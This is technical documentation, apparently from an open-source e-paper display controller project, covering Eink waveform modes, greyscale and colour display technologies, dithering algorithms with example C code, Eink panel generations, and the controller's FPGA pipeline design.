To give system designers more flexibility, Eink controllers often offer multiple "modes", like binary mode, 16-level grayscale mode, 16-level grayscale mode with reduced flashing, 4-level grayscale mode, etc.
The waveform provided by Eink has many modes. There is a good document from Eink describing the modes:
https://www.waveshare.net/w/upload/c/c4/E-paper-mode-declaration.pdf
It provides a good overview of the modes. I am just going to add some comments.
- GC in the GC16 stands for "greyscale clearing". GC does not stand for greyscale. There are 16-level greyscale modes that aren't called GC16.
- Officially there are no 32-level greyscale modes (yet). There are 5-bit waveforms, which means they internally use 5 bits for each pixel, which potentially allows up to 32-level greyscale, but no such waveform exists (yet).
- There are no 16-level greyscale modes without flashing. The DU4 is the only greyscale mode that's non-flashing.
- The GL16 mode, as described, only works for black text on a white background. When refreshing greyscale images, the GL16 is similar to the GC16.
- The GLR16 mode is also called the REGAL mode, and the GLD16 mode is also called the REGAL-D mode.
- Eink doesn't even know if it should be spelled as REAGL or REGAL: Google search "REAGL site:eink.com" and "REGAL site:eink.com" both returned several results.
- Eink-provided waveforms usually implement all these modes, though this is not always required. The waveform file may also contain waveform tables in other orders.
- In terms of the waveform, the waveforms for GL16, GLR16, and GLD16 are identical. This is expected: REGAL requires an additional algorithm on the host's image processing side and is not a technology based on tweaking the waveform.
#### Waveform Tweaks
Some commercial implementations allow users to reduce the frame count and/ or alter the waveform playback speed, so the user can trade between contrast ratio and frame rate.
### Greyscale Display
Other than full white and full black, with appropriate modulation, Eink screens can also display some levels of greyscale (typically 16).
![greyscale](assets/eink_32g.jpg)
For grayscale displays, the basic idea is simple. If the pixel is not fully driven (say it is only driven for 50ms while it takes 100ms to reach full black/white), it stays in a grey state.
There are two ways of achieving this modulation:
- Modulate the frame time
- Modulate the number of frames with constant frame rate
Both are possible, as described below
#### Frame Time Modulation
This method changes the drive time by changing the length of a single frame. The screen is only driven for 15 or 31 frames for 16-level and 32-level greyscale respectively, but the frame time (and thus the frame rate) is altered to provide the desired driving time. The LUT would be a one-dimensional look-up table, only containing the incremental time required to drive to the next greyscale level. The source/gate driver output enable lines are toggled to achieve the desired driving time.
This method doesn't seem to be implemented in any commercial solutions and is significantly slower than the second method. But it certainly works. The 32-level greyscale demo shown in the picture above is achieved using this method.
#### Frame Count Modulation
This method changes the drive time by changing the number of frames being applied to the screen. The screen is still being driven at a constant frame rate. The following is a simplified hypothetical waveform table for achieving 4-level greyscale:
| Previous State | Target State | Frame 0 | Frame 1 | Frame 2 | Frame 3 | Frame 4|
|-|-|-|-|-|-|-|
| Black | Black | NOP | NOP| NOP | NOP | NOP |
| Black | Dark Grey | VPOS | VNEG | VPOS | NOP | NOP |
| Black | Light Grey | VPOS | VNEG | VPOS | VPOS | NOP |
| Black | White | VPOS | VNEG | VPOS | VPOS | VPOS |
Note how it alternates between VPOS and VNEG in the beginning. This is often called the "activation phase" to improve the contrast ratio. Putting this detail aside, it changes the number of VPOS frames to settle down on different grey levels.
The actual grayscale driving sequence used in the commercial implementation is more complex than that, often involving switching the pixel towards black/white a few times before settling. This design is partially due to the limited time control granularity and other temperature/ manufacturing variance-related concerns. Some side-effects of such a driving sequence are that the refreshing process is “flashing”, and is slower compared to displaying only a 1-bit binary image.
### Color Display
There are several different technologies that could be used to build full-color EPDs. The 2 most common ways are to use a color-filter-array (CFA) or use a multi-pigment color display.
The following picture has the multiple pigment color display (ACeP Gallery 3) on the left, and a CFA-based color screen (Kaleido Plus) on the right, displaying the same image.
![gallery3_kaleido](assets/gallery3_kaleido_plus.jpg)
(Original illustration copyright MiHoYo)
#### Color Filter Array
CFA stands for color filter array, which is a colored glass/film on top of the screen pixels. This is also the technology used on most color LCDs. Eink Kaleido, Eink Triton, and color DES are based on this technology. The main advantage is that it's relatively simple to control, and the low-level driving is the same as for greyscale panels. Thus it has the same refresh time (100~200ms) and the same greyscale depth (16 levels translate to 16^3 = 4096 colors). The drawback is that the CFA filters out some light (due to its colored nature), so the screen reflectivity is negatively affected and the screen ends up being quite dark. Up to now, most color E-readers use CFA-based displays. This project supports all three major types of CFA-based EPD screens: color DES screens, Eink Triton, and Eink Kaleido.
#### Case Study: GDEW101C01 (CFA-based, DES)
The GDEW101C01 is a 10.1" color DES screen made by Good Display / WeiFeng Tech. It uses CFA to produce color images. As a result, to the eink controller hardware, it's just a normal greyscale panel with a bunch of pixels. However, the pixels are colored depending on their location due to the CFA. The coloring of the pixels can be either handled by hardware or software.
##### Pixel Arrangement
Color DES is a bit different from a typical color TFT LCD in terms of CFA design. Typically on TFT LCDs, one RGB group is called a pixel, and each R/G/B component is called a sub-pixel. On color DES, the sub-pixel ends up being called a pixel, and each pixel is either red, green, or blue. In the display industry, such pixels are more commonly referred to as dots.
![subpixel](assets/subpixel.jpg)
Pengo, CC BY-SA 3.0 https://creativecommons.org/licenses/by-sa/3.0, via Wikimedia Commons
The actual photo of the DES panel under the microscope:
![color-des](assets/color_des.jpg)
In the above photo, the DES pixel arrangement is the same as on the OLPC XO-1. Notably, many (but not all) of Eink's Kaleido 3 screens also use the same pixel arrangement.
Having no subpixels (each pixel has only 1 color) doesn't necessarily mean the effective resolution needs to be divided by 3. This arrangement is slightly more "efficient" than the RGB stripe in terms of perceptual resolution. You can find a more detailed analysis in the paper Comparing the Effective Resolution of Various RGB Subpixel Layout.
##### Processing image for Color DES
If the image is displayed on color DES without any processing, it would look like a greyscale image. This is similar to when you just send the same color value to R/G/B components on a color LCD.
To get color, send only the color component that corresponds to the pixel color.
![pixel-layout](assets/PixelLayoutDiagonal.png)
(Source: https://wiki.laptop.org/go/File:PixelLayoutDiagonal.png, public domain)
For example, for pixel 01, the pixel on the screen is green. Then only the green component from the frame buffer should be sent to the screen.
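A minimal sketch of this per-pixel component selection is shown below. The `cfa_color_at()` helper is hypothetical; the real mapping depends on the panel's CFA layout:

```c
#include <stdint.h>

typedef struct { uint8_t r, g, b; } rgb_t;

// Hypothetical helper: return which color (0 = R, 1 = G, 2 = B) the CFA assigns
// to the pixel at (x, y). The real mapping depends on the panel's CFA layout.
extern int cfa_color_at(int x, int y);

// Convert a full-color framebuffer into the per-pixel greyscale values actually
// sent to a CFA-based panel: each pixel only gets its own color component.
void map_to_cfa(const rgb_t *in, uint8_t *out, int width, int height) {
    for (int y = 0; y < height; y++) {
        for (int x = 0; x < width; x++) {
            const rgb_t p = in[y * width + x];
            switch (cfa_color_at(x, y)) {
            case 0:  out[y * width + x] = p.r; break;
            case 1:  out[y * width + x] = p.g; break;
            default: out[y * width + x] = p.b; break;
            }
        }
    }
}
```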
To get a basic 4096-color image display, this is everything needed. However, to improve image quality, a few more steps are generally applied:
##### Low pass filtering
The previously described image-displaying process is essentially a down-sampling process for each color component: only 1/3 of the pixels are sent to the screen. This becomes a classic signal processing issue: sampling the signal causes frequency components above Nyquist to fold back into the low-frequency part. Or, in simpler words, you would see jagged edges/aliasing that weren't present in the original image. To prevent this, low-pass filtering (blurring) needs to be applied to the image first to remove these high-frequency components. The following diagram from the OLPC wiki shows a simple way of implementing such a filter:
![pixel-proc](assets/PixelProcDiagonal.png)
(Source: https://wiki.laptop.org/go/File:PixelProcDiagonal.png, public domain)
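As an illustration, the sketch below blurs one color plane with a generic 3x3 1-2-1 kernel before the CFA mapping. This is not the exact filter from the OLPC diagram above, just a stand-in low-pass filter:

```c
#include <stdint.h>

// Sample one color plane at (x, y) through a small 3x3 low-pass kernel.
// The 1-2-1 weights are a generic example, not the OLPC-specific weighting.
static uint8_t blur3x3(const uint8_t *plane, int w, int h, int x, int y) {
    static const int k[3][3] = { {1, 2, 1}, {2, 4, 2}, {1, 2, 1} }; // sums to 16
    int acc = 0;
    for (int dy = -1; dy <= 1; dy++) {
        for (int dx = -1; dx <= 1; dx++) {
            int sx = x + dx, sy = y + dy;
            if (sx < 0) sx = 0; if (sx >= w) sx = w - 1;  // clamp at the edges
            if (sy < 0) sy = 0; if (sy >= h) sy = h - 1;
            acc += k[dy + 1][dx + 1] * plane[sy * w + sx];
        }
    }
    return (uint8_t)(acc / 16);
}
```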
##### Dithering
Dithering can be applied to further improve image quality. See the dithering section for more details.
#### Multi-Pigment Color Display
Another technology for implementing color EPD is by using a multi-pigment color display. This is a technology developed initially by SiPix and further improved by Eink. The basic idea is to use ink particles with different colors inside a single pixel. By applying a sequence of voltages, the ink particles can be arranged to display different colors.
![spectra6](assets/eink_spectra6.jpg)
(Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation)
One major advantage of this solution is it can achieve higher resolution (because it doesn't have a CFA, so no resolution reduction), higher reflectivity (because it doesn't have a CFA, so no light loss), and higher color saturation (because it doesn't have a CFA, no need to play the reflectivity vs saturation trade-off game).
Eink has 2 lines of products using this technology, Eink Gallery and Eink Spectra. The advantage is that they are much brighter compared to CFA-based solutions. The disadvantage is that they are much more difficult to drive, and quite slow: 1st/2nd gen Eink Gallery screens take 30s (!) to refresh, and Spectra 6 Plus devices take 7s to refresh. It's possible to trade in some color saturation for higher speed, though the result is still much slower than CFA-based solutions. The specific product lines will be discussed in [Eink Screen Generations](#eink-screen-generations).
##### How ACeP Waveform Works
To be written (TODO)
##### How to get more colors on ACeP
This is possible with a modified waveform.
To be written (TODO)
##### What Happened To ACeP?
[ACeP was supposed to be the "next big thing" in ereaders](https://arstechnica.com/gadgets/2022/04/new-e-ink-gallery-displays-could-finally-make-full-color-e-readers-good/). Back at the end of 2022, Eink announced that ["Gallery 3 has moved into mass production, with customer products from Bigme, BOOX, iFlyTek, iReader, PocketBook, Readmoo, and AOC coming down the pipeline in 2023 and beyond"](https://www.e-ink-info.com/e-ink-gallery-3-acep-color-epaper-displays-move-mass-production). But 2023 passed with exactly one product, the Bigme Galy, with mixed reception. In early 2024, it was announced that [the Bigme Galy has been discontinued](https://goodereader.com/blog/electronic-readers/bigme-galy-is-discontinued), and [Eink has announced EOL for certain ACeP-based products](https://www.ineltek.com/wp-content/uploads/2024/04/EInk_AC073TC1_EOLNoticeLetter_notice_20240401.pdf). It does sound like ACeP is now dead.
The following are purely my speculation. But I see this as 2 separate decisions:
- ~~There will be no more multi-pigment-based displays for the eReader market~~
- ACeP (CMYW) is being replaced with Spectra 6 (RYBW) in other markets
The second one is evident from the EOL notice linked previously: the 7.3" ACeP screen has a direct replacement in the 7.3" Spectra 6 screen. One major drawback of ACeP in the digital signage market (as far as I can see) is its inability to reproduce the cyan color. This means there is no good way to display a blue sky on an ACeP screen, not even through dithering; it's simply outside of its color gamut. By changing the base colors used, Eink was able to mitigate this issue in the Spectra 6 product line.
The first one is more or less speculation. (UPDATE: I WAS WRONG, read on) I have two clues for that. One is the fact that Eink is doubling down on digital signage for Spectra 6: [Both 13.3" and 31.5" Spectra 6 screens will have integrated controllers](https://www.beck-elektronik.de/en/newsroom/news/article/e-ink-spectratm-6-der-hingucker-des-jahres-2024). This makes them much more interesting for signage applications, but unsuitable for eReader applications. The other is that [the 8" Spectra 6 Plus screen](https://www.ereaderpro.co.uk/en/blogs/news/e-ink-news-eink-technology-has-unveiled-the-new-generation-of-colour-e-paper-technology-e-ink-spectra-6-plus-designed-for-retail-tags-and-advertising-billboards), while using the same backplane as the Gallery 3 ACeP screen, now quotes a 7-second refresh time (compared to less than a second on Gallery 3). If Eink still wanted to make a Spectra 6 eReader screen, this 8" backplane would be the one to use, given it was used in the ACeP product line.
Objectively, the ACeP screen on the Bigme Galy pretty much doesn't make any sense anyway. It suffers from poor reflectivity and poor saturation to a point where it's not much better than Kaleido (see the previous photo). The difference between Gallery 3 and Gallery Palette (which is supposed to be a lower-end product) is also stunning:
![acep_comparison](assets/gallery3_gallerypalette.jpg)
(Original illustration copyright MiHoYo)
The one on the left is the Gallery 3 used on eReaders, and the one on the right (the brighter and more saturated one) is the Gallery Palette used on ESLs. Though, to be honest, I hacked the right one a bit to display 512 colors as opposed to the stock 7 colors. If Gallery 3 had the same image quality as previous ACeP/Gallery screens, it would make sense to trade response time for better image quality. But it doesn't.
So is ACeP dead? Yes and no. ~~Yes in the sense that we are less likely to see any new ACeP products in the future~~, and we are also unlikely to see any Spectra 6-based eReader products. No in the sense that ACeP is superseded by Spectra 6, so the technology lives on. Just like how the Pearl replaced the Vizplex, and the Carta replaced the Pearl: now that we have Carta, we don't look back at the older generations of screens. Also, in another sense, there are likely at least thousands of ACeP screens already manufactured that haven't been made into consumer devices. We will probably see these screens in the not-too-distant future!
UPDATE: As pointed out in a [reddit post by Disastrous_Analyst_1](https://www.reddit.com/r/eink/comments/1d2j4mv/gallery_3_part_ii/), Eink in their [2023 Annual Report](https://www.eink.com/upload/2024_05_27/47_20240527170208rfrozhGN77.pdf) said that "In 2024, we will provide an upgraded version of the 8-inch advanced color ePaper (Gallery™ 3), aiming to deliver optimized performance and enhanced visual experience for customers. (在 2024 年,我們將進一步提供進階版 8 吋先進彩色電子紙(Gallery ™ 3),期待能提供更優化的性能及更好的視覺體驗給客戶)" in V. Operational Highlights, 5.1 Business Activities, 5.1.2 Industrial Overview, 3. Product Development Trends, A. eReader. This means we might be able to see more Gallery 3 (or similar technology) based eReaders in the years to come.
### Dithering
Eink and DES panels typically only support up to 16 levels of greyscale with the vendor-provided waveform. To improve response time, or to avoid flashing images, a binary (1-bit, 2-level) display is also used. Dithering could be applied to produce better images (increasing SNR, in signal processing sense).
The following is applying dithering to a simple black-to-white gradient. Note the results are not optimal due to limitations in quantization and incorrect gamma correction. But the idea is the same.
| Original | Binary No-dithering | 2 Row Sierra Dithered |
|-|-|-|
| ![original](assets/grad_orig.png) | ![nodither](assets/grad_no_dither.png) | ![errordiffusion](assets/grad_ed.png) |
Dithering can help when the screen has a native 16-level greyscale as well:
| Original | 16 Level Greyscale No-dithering | 16 Level Greyscale Dithered |
|-|-|-|
| ![original](assets/grad_orig.png) | ![nodither](assets/grad_4bpp_nd.png) | ![errordiffusion](assets/grad_4bpp_ed.png) |
As you can see in the binary example, the non-dithered image loses all the greyscale in between, while the dithered version gives the illusion of greyscale while using only full black and full white.
To understand it further, take the following example:
Say the source image is 30% brightness (or 0.3). This cannot be displayed on a binary screen which can only display 0% (0.0, black) or 100% (1.0, white) brightness. A simple thresholding process is added to determine if the screen should display 0 or 1 by checking the incoming brightness. If it's less than 0.5 then the display brightness is rounded down to 0, otherwise 1. Because 0.3 is always lower than 0.5, the whole screen displays 0 (black).
This is less than ideal. A better way is to set around 30% of the pixels to white and 70% of the pixels to black. Different dithering algorithms can be used to achieve this 30/70 distribution. Two common methods are ordered dithering and error-diffusion dithering, which are described below.
#### Ordered Dithering
The ordered dithering adds a pre-computed/ fixed texture to the image before the thresholding process. In other words, it basically adds some noise to the image. This may sound weird initially, but it should be easy to see the effect of noise in the example.
Using the previous example of displaying 30% brightness grey on a binary screen, the goal is to let the rounding process end up with 1 for 30% of the time and 0 for 70% of the time. This can be achieved by adding noise. In the simplest case, a random number with a uniform distribution over [-0.5, 0.5] is added to the incoming brightness. The brightness has a value of 0.3; after adding the noise, the result has a uniform distribution over [-0.2, 0.8]. The threshold is still set to 0.5, and the probability distribution can now be seen below:
![pdf](assets/dithering_pdf.svg)
The pixel now has a 30% chance of being rounded up to 1, and a 70% chance of being rounded down to 0. Before dithering, it would always be rounded down to 0.
However, a purely random number is generally not the best noise to use. Bayer dithering matrix and blue noise are more commonly used, with the results as illustrated below. The idea is the same, but instead of adding random numbers, a pre-computed number from the Bayer dithering matrix (array) or blue noise texture (array) is added to the image.
| Random Dithering| Bayer Dithering | Blue-noise Dithering |
|-|-|-|
| ![random](assets/grad_rand.png) | ![bayer](assets/grad_bayer.png) | ![bluenoise](assets/grad_bn.png) |
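As a minimal sketch, ordered dithering with the standard 4x4 Bayer matrix, quantizing an 8-bit greyscale image down to 1 bit, can look like this:

```c
#include <stdint.h>

// Standard 4x4 Bayer matrix, values 0..15
static const uint8_t bayer4[4][4] = {
    { 0,  8,  2, 10},
    {12,  4, 14,  6},
    { 3, 11,  1,  9},
    {15,  7, 13,  5},
};

// Dither an 8-bit greyscale image down to 1 bit (0 = black, 1 = white)
void ordered_dither_1bit(const uint8_t *in, uint8_t *out, int width, int height) {
    for (int y = 0; y < height; y++) {
        for (int x = 0; x < width; x++) {
            // Scale the matrix entry to roughly [-128, +112] and use it as noise
            int noise = (bayer4[y & 3][x & 3] * 16) - 128;
            int value = in[y * width + x] + noise;
            out[y * width + x] = (value >= 128) ? 1 : 0;
        }
    }
}
```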
#### Error-Diffusion Dithering
The basic idea is that when quantizing the color (for example, selecting the closest of 16 greyscale levels from a 256-level input), the error (difference) is calculated and added to neighboring pixels, so the error is taken into account when those pixels are processed later. The whole process is called error diffusion.
Still using the previous example of a 30% brightness image, and assume an extremely simple dither kernel: diffuse all error to the next pixel. Let's see it in action.
In the first pixel, 0.3 (image brightness) is less than 0.5 (threshold), so it's displayed as 0 (black). This introduces a 0.3 error: the displayed color is 0.3 darker than the requested color. So 0.3 is being diffused to the next pixel, hoping the next pixel can correct the error.
Onto the second pixel. The value is 0.3 (image brightness) + 0.3 (diffused error) = 0.6. It's now larger than 0.5 (threshold), so it's displayed as 1 (white). This introduces a -0.4 error: the displayed color is 0.4 brighter than the requested color. -0.4 will be diffused to the next pixel.
For the 3rd pixel, the value is now 0.3 - 0.4 = -0.1. This is less than 0.5 and displayed as 0 (black). Error -0.1 is diffused further.
And this process just goes on. With enough pixels, eventually, it would yield about 30% of white pixels and 70% of dark pixels.
Similar to how a purely random value is not the best choice in ordered dithering, diffusing everything to the right is also less than ideal: it creates very repetitive patterns. I mentioned the word kernel. Error diffusion uses a diffusion kernel, which specifies where the error is diffused to and what proportion each target receives. There are many classic kernels, such as Floyd-Steinberg, Stucki, and Sierra, commonly used for image dithering. They all diffuse to more than 1 pixel to improve the overall look of the image. As shown below, even just diffusing the error to 2 pixels (half of the error goes to the pixel on the right, and the other half goes to the pixel below) yields a much better result:
| Dither to Right | Right and Down | Floyd-Steinberg |
|-|-|-|
| ![right](assets/grad_naive.png) | ![rightdown](assets/grad_naive2.png) | ![fs](assets/grad_fs.png) |
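For reference, here is a minimal sketch of Floyd-Steinberg error diffusion down to 1 bit (8-bit greyscale input; boundary handling and rounding are kept simple for clarity):

```c
#include <stdint.h>
#include <stdlib.h>

// Floyd-Steinberg dithering of an 8-bit greyscale image down to 1 bit.
void fs_dither_1bit(const uint8_t *in, uint8_t *out, int width, int height) {
    // Working copy so the diffused error can exceed the 0..255 range
    int *work = malloc(sizeof(int) * width * height);
    for (int i = 0; i < width * height; i++) work[i] = in[i];

    for (int y = 0; y < height; y++) {
        for (int x = 0; x < width; x++) {
            int old = work[y * width + x];
            int quant = (old >= 128) ? 255 : 0;       // quantize to black/white
            out[y * width + x] = quant ? 1 : 0;
            int err = old - quant;                    // quantization error
            // Diffuse the error to the neighbors with Floyd-Steinberg weights
            if (x + 1 < width)      work[y * width + x + 1]       += err * 7 / 16;
            if (y + 1 < height) {
                if (x > 0)          work[(y + 1) * width + x - 1] += err * 3 / 16;
                                    work[(y + 1) * width + x]     += err * 5 / 16;
                if (x + 1 < width)  work[(y + 1) * width + x + 1] += err * 1 / 16;
            }
        }
    }
    free(work);
}
```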
#### Applying Dithering on CFA-based Color Screens
Dithering can be applied to CFA-based color screens such as Eink Kaleido and color DES screens as well. The following is on a simulated DES screen (the "original" on the left assumes the screen has native 24bpp color, still simulated):
| 16M color DES (does not exist) | 8-color DES | 8-color DES Dithered |
|-|-|-|
| ![original](assets/color_8bpp.png) | ![nodither](assets/color_nd.png) | ![errordiffusion](assets/color_ed.png) |
Ordinary dithering kernels don't work too well on color screens. For example, the error-diffusion dithering process pushes/diffuses error to neighboring pixels without considering their color. Ideally, it should push/diffuse the error only to pixels with the same color. This is fairly easy to fix though: by tweaking the kernel, good results can be achieved on CFA-based screens as well. (I am going to shamelessly call it Wenting's kernel.)
| 16M color DES (does not exist) | 8-color DES naively apply Floyd-Steinberg (wrong) | 8-color DES with Wenting's kernel |
|-|-|-|
| ![original](assets/color_8bpp.png) | ![original](assets/color_fs_wrong.png) | ![errordiffusion](assets/color_ed.png) |
Of course, one can apply Bayer-like ordered dithering, blue noise dithering, or dithering on 4096-color mode as well:
| 8-color DES Bayer-like | 8-color DES Blue-noise | 4096-color DES Error-diffusion |
|-|-|-|
| ![original](assets/color_bayer.png) | ![original](assets/color_bn.png) | ![errordiffusion](assets/color_4bpp_ed.png) |
It's called Bayer-like because, similar to how naively applying error diffusion doesn't work, the Bayer matrix has to be modified to work on the color screen.
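To illustrate the idea (and only the idea; this is not the actual kernel used by this project), the sketch below diffuses each pixel's error only to the nearest following pixels of the same CFA color, reusing the hypothetical `cfa_color_at()` helper from the earlier sketch. `work` is an int working copy of the per-pixel component values:

```c
#include <stdint.h>

extern int cfa_color_at(int x, int y);  // hypothetical CFA color lookup (0/1/2)

// Color-aware error diffusion for CFA screens: the quantization error of each
// pixel is diffused only to the nearest following pixels of the same color.
void cfa_aware_dither(int *work, uint8_t *out, int width, int height) {
    for (int y = 0; y < height; y++) {
        for (int x = 0; x < width; x++) {
            int idx = y * width + x;
            int quant = (work[idx] >= 128) ? 255 : 0;
            out[idx] = quant ? 1 : 0;
            int err = work[idx] - quant;
            int c = cfa_color_at(x, y);
            // Next pixel of the same color in this row gets half of the error
            for (int nx = x + 1; nx < width; nx++) {
                if (cfa_color_at(nx, y) == c) { work[y * width + nx] += err / 2; break; }
            }
            // Next pixel of the same color in this column gets the other half
            for (int ny = y + 1; ny < height; ny++) {
                if (cfa_color_at(x, ny) == c) { work[ny * width + x] += err / 2; break; }
            }
        }
    }
}
```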
#### Gamma Correction
Another thing to consider is gamma. The dithering process involves a step of selecting the closest value. However, selecting the closest numerical value does not necessarily mean the closest color. The image typically is in sRGB space, which is non-linear. This causes the simple rounding to pick the wrong color, also calculating the wrong error value. One solution is to work in the linear space. This is also known as gamma-aware dithering. You could read more related info online, for example here: [https://learnopengl.com/Advanced-Lighting/Gamma-Correction](https://learnopengl.com/Advanced-Lighting/Gamma-Correction).
![dither-gamma](assets/dither_gamma.jpg)
The difference is quite evident when dithering down to 1 bit for a color screen. The top left is the original image, the top right is dithering in the sRGB space, and the bottom left is dithering in the linear space.
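For reference, the standard sRGB transfer functions used for gamma-aware dithering look like this; quantization and error calculation are then done on the linear values:

```c
#include <math.h>

// Standard sRGB transfer functions, operating on normalized [0, 1] values
static double srgb_to_linear(double s) {
    return (s <= 0.04045) ? s / 12.92 : pow((s + 0.055) / 1.055, 2.4);
}

static double linear_to_srgb(double l) {
    return (l <= 0.0031308) ? l * 12.92 : 1.055 * pow(l, 1.0 / 2.4) - 0.055;
}
```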
#### Further Reading
See [https://en.wikipedia.org/wiki/Dither](https://en.wikipedia.org/wiki/Dither) for more information about dithering.
### Eink Screen Generations
Depending on how you count, there are multiple generations of Eink screens commercially available. For monochrome screens before 2023, it's possible to tell the generation by looking at the 6th digit on the serial number:
![eink_serial](assets/eink_serial.jpg)
That is the FPL code in the following table:
| FPL Platform | FPL Code | Panel Model | Marketing Name | First Introduced |
| ------------ | -------- | -------------- | ----------------------- | ---------------- |
| 2.0 | 0 | | | ? |
| 2.1 | 1 | | | 2004 |
| 2.3 | 2 | | | ? |
| V100 | 3 | | Vizplex | 2007 |
| V110 | 4 | | Vizplex | 2008 |
| V110A | 5 | | Vizplex | 2008 |
| V220 | 6 | VA3200 | Pearl | 2010 |
| V250 | 7 | | Pearl | ? |
| V220E | 8 | | Pearl | ? |
| V320 | 9, R | VB3300 | Carta 1.2 / 1000 | 2013 |
| V320 | ? | VB3300? | Carta 1100 | 2019 |
| V400 | A, C | VD1400/ VD1405 | Roadrunner / Carta 1200 | 2021 |
| V450 | ? | VH1948 | Carta 1250 | 2021? |
| ? | ? | VD1405 | Carta 1300 | 2023 |
Data points used to create the table above:
- The first commercialized Eink e-reader SONY Librie hit the market in 2004, *likely* with an ED060SC1 panel
- ED060SC1 has an FPL code of 1 on the barcode, meaning the 2.1 platform
- Multiple datasheets (like the one for ED060SC4) confirms the 6th digit marks the FPL code with mapping for V220/220E/320/400
- Inkwave's WBF decoder (originated from Kindle GPL kernel code) provides an FPL platform to an FPL code mapping table that matches well with info from the datasheet
- Kindle Oasis3 was reported to use a Carta 1100 screen, and it has an ED070KC3 screen with a V320 FPL platform
- Kindle PW5 was reported to use a Carta 1200 screen, and it has an ED068KC5 with a VD1405 panel model
- Kobo Clara BW was reported to use a Carta 1300 screen, and it has an ED060KHE with a VD1405 panel model
- The datasheet of ED068KC1 mentioned the name "Roadrunner" for the 400 platform, but that name never gets used outside of that. I would guess they were going to use the Roadrunner for the new generation but eventually fell back to Carta 1200 so it's more like an incremental improvement
- From the information available, it really looks like Carta 1000 and 1100 use the same film, and Carta 1200 and 1300 use the same film. If this is true, it may sound like a scam if they are named differently but use the same film. But this is actually okay. Just like how chips usually have a binning process, the same chip would sell under different product names with different performance levels. It's reasonable for Eink to do incremental improvements on the manufacturing process to yield better screens with the same film and call it under a different name, or simply binning screens to different grades and selling under different names.
I will let you decide how to count the generations.
For the CFA-based screens, the following generations of screens exist:
- Eink Triton: First generation color screen. Uses an RGBW glass color filter and square pixels. The underlying screen panel uses Pearl film.
- Eink Triton 2: 2nd generation color screen. Uses RGB glass color filter and stripe pixel. The underlying screen panel uses Pearl film.
- Eink Kaleido: 3rd or 2nd gen color screen depending on the definition. Uses an RGB color filter. Each pixel is still square, but each color covers 3 pixels. The underlying screen panel uses Carta film.
- Eink Kaleido Plus: 2nd gen Kaleido. Uses an RGB color filter. Each pixel is still square but different configurations exist. Some screens have each color covering 2 pixels, some others have each color covering only 1 pixel. The underlying screen panel uses Carta film.
- Eink Kaleido 3: 3rd gen Kaleido. At least 2 different configurations exist. One features an RGB filter covering 1 pixel per color, the other features a 2R/2G/1B configuration, on average 5/3 pixels per color. The underlying screen panel uses Carta 1000/1200/1250/1300 film depending on the model.
- Eink Kaleido 3 Outdoor: Wide temperature version of Kaleido 3.
As far as I know, all CFA-based color screen panels don't come with an integrated controller.
For the multiple-pigment color screens based on SiPix technology, the following generations of screens exist:
(Color abbreviation: B: black, W: white, R: red, Y: yellow, B: blue, C: cyan, M: magenta)
- Eink Spectra 3000: BWR or BWY 3 color screen.
- Eink Spectra 3100: BWRY 4 color screen.
- Eink Spectra 3100 Plus: BWRY 4 color screen. The orange display is now possible with driver circuit changes
- Eink Spectra 6: RYBW 4 color screen. Can reproduce 6 different colors by mixing colors
- Eink Spectra 6 Plus: RYBW 4 color screen. Still reproduces 6 different colors. Allows faster refresh compared to 6 with driver circuit changes
- Eink Gallery (also known as Gallery 4000): CMYW 4 color screen (ACeP).
- Eink Gallery Plus (also known as Gallery 4000): CMYW 4 color screen (ACeP).
- Eink Gallery Palette (also known as Gallery Palette 4000): CMYW 4 color screen (ACeP). Reproduce 7 different colors.
- Eink Gallery 3: CMYW 4 color screen (ACeP). Reproduce around 10 different colors, much faster than other Gallery screens at the cost of lower saturation and lower reflectivity
There are both integrated-controller Spectra/Gallery screens and controller-less Spectra/Gallery screens.
Additional notes regarding the multi-pigment color screens:
- ACeP, or Advanced Color ePaper, refers to the CMYW 4-color screens; it is not a product line on its own.
- To be honest, I don't know how many colors can be reproduced on Gallery or Gallery Plus screens based on public information. The spec sheet for [AC133UT1](https://www.beck-elektronik.de/fileadmin/user_upload/Produkte/BECK_Elektronik/Displays/Downloads/EPD/E-Ink/AC133UT1_Specs.pdf?v=1662907755) suggests it might be 8 colors. Eink claims 32000 or 60000 colors in their materials, but they also clarified that these numbers refer to color gamut. In other words, they represent color saturation rather than the number of different colors that can be displayed on screen. Dithering is heavily used to display color images on Gallery screens.
- It's possible to achieve more colors on Gallery Palette screens. 7 is not a physical limit.
- The Gallery 4000 rebranding happened in [2020](https://www.linkedin.com/pulse/e-ink-gallery-4000-anna-rybalko/); however, Eink never seems to use that name on their website.
## Design of Caster and Glider
This section describes the design specific to the Caster and Glider. The following is an overall block diagram showing both hardware and gateware components in the signal chain:
![Overall Block Diagram](assets/glider_overall_block_diagram.svg)
### Gateware Architecture
The FPGA gateware is divided into multiple modules. The caster.v is the top-level of the EPDC core design, but several additional components are connected under top.v to form a complete image processing system. Different components are generally inter-connected with synchronous or asynchronous (in case of clock domain crossing) FIFOs.
The top-level design has 3 major clock domains:
- clk_vi: input video clock domain, running at ½ pixel rate
- clk_epdc: EPDC clock domain, running at ¼ pixel rate
- clk_mem: memory clock domain, running at ¼ memory transfer rate
To understand how it works, the following is a guided tour around the life cycle of a pixel.
Before an incoming pixel can be processed by the controller, the memif module needs to retrieve the local pixel state from the DDR SDRAM. Once the value is retrieved, it’s pushed into the state readout/ input FIFO (bi_fifo). At/ around the same time, the input video stream is pushed into the video input FIFO (vi_fifo).
The EPDC runs a local Eink timing generator for counting pixels and blankings. This timing should be a slightly delayed version of the incoming video timing. Once the local timing generator determines that it needs to output the pixel soon, the EPDC logic pops out one pair of the video input and state readout and starts processing.
The two values (pixel state and input pixel) then go through the video processing pipeline:
- Stage 1: This pipeline stage waits for the FIFO to output the data.
- Stage 2: The 8-bit input image is dithered down to 1-bit and 4-bit at this stage for later use.
- Stage 3: The waveform lookup is done at this stage for 16-level grayscale modes
- Stage 4: Based on the pixel state, the new state and voltage selection value are determined at this stage.
- Stage 5: The new state is pushed into the state writeback/ out FIFO (bo_fifo) and the voltage selection is sent to the screen.
The memif module later pops out the writeback value from the bo_fifo and writes it back to the DDR SDRAM.
The EPDC always processes 4 pixels per clock. For screens with different interface widths, a rate adapter is added after the EPDC output. Some logic is duplicated 2 or 4 times (such as the waveform RAM or the pixel decision logic), while some are extended and daisy-chained (such as the error diffusion dithering unit) to achieve the 4 pixels per clock throughput.
### Firmware Functions
The MCU manages housekeeping items as described below. It currently doesn’t use any operating system but rather relies on a main-loop style operation.
